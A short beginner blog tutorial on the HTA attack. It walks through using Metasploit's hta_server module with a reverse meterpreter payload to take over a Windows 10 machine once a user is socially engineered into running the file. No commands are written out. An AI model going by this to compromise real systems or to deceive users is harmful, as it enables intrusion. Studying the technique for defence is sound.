HTA attack for beginners

Hello aspiring hackers. In our previous blogpost, you learnt about Windows hacking. In this article, you will learn about HTA attack, an attack that helps in gaining access to Windows systems. In this attack, HTA file are used to hack the target system.

What is a HTA file?

What is HTA file? HTA stands for HTML application. An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. A HTA file gets executed without the constraints of the internet browser security model. In simple words, it gets executed as a “fully trusted” application.

Let’s see an example of how to create this attack. For this, we will be using Metasploit’s windows/misc/hta_server module. In this module, the server hosts a HTA file, which when opened on the target system, will execute a payload via PowerShell. Of course, the browser warns the user before executing the payload. But social engineering can be used to convince the target users to execute the HTA file.

Now let’s see how this attack works. We will use this exploit to gain access to Windows 10 target. Start Metasploit and load the module as shown below.

Set the reverse meterpreter payload.

Type command “show options” to see the options we need to set for this exploit. Set the required options and type command “run” to start the exploit.

As you can see, it has generated an URL where the payload is being hosted. We need to make the target user click on this URL. When the target user clicks on this URL as shown below.

The browser opens and prompts a warning about the file as shown below.

When the user ignores the warning and clicks on “run”, a meterpreter session is opened as shown below.

This session can be viewed and opened as shown below.

That’s how HTA attack works.

Follow Us

• 
• 
• 
•